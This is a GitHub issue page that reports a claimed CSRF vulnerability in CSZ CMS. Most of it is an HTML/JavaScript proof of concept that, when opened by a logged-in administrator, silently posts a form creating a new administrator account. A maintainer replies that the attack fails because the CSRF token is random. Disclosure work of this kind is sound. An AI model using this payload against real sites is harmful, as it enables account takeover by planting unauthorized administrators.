Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following page poc: one.html---add a administrator
<!-- CSRF PoC --> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/localhost\/cszcms-master\/admin\/users\/new\/add", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykobVwTQR7Qxut2B0"); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8"); xhr.withCredentials = true; var body = "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"csrf_csz\"\r\n" + "\r\n" + "f34972c37ae66af1cf3355b95a25e347\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"name\"\r\n" + "\r\n" + "test3\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"email\"\r\n" + "\r\n" + "test3@test3.com\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "test3\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"con_password\"\r\n" + "\r\n" + "test3\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"group\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"active\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"first_name\"\r\n" + "\r\n" + "te\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"last_name\"\r\n" + "\r\n" + "st\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"year\"\r\n" + "\r\n" + "1929\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"month\"\r\n" + "\r\n" + "02\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"day\"\r\n" + "\r\n" + "02\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"gender\"\r\n" + "\r\n" + "male\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"address\"\r\n" + "\r\n" + "123\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"phone\"\r\n" + "\r\n" + "15826597895\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"file_upload\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + "Content-Disposition: form-data; name=\"submit\"\r\n" + "\r\n" + "Save\r\n" + "------WebKitFormBoundarykobVwTQR7Qxut2B0--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>```
The text was updated successfully, but these errors were encountered:
It not working for all. Because you don't know csrf_csz key on next submit. It's random.
Sorry, something went wrong.
No branches or pull requests
After the administrator logged in, open the following page
poc:
one.html---add a administrator
The text was updated successfully, but these errors were encountered: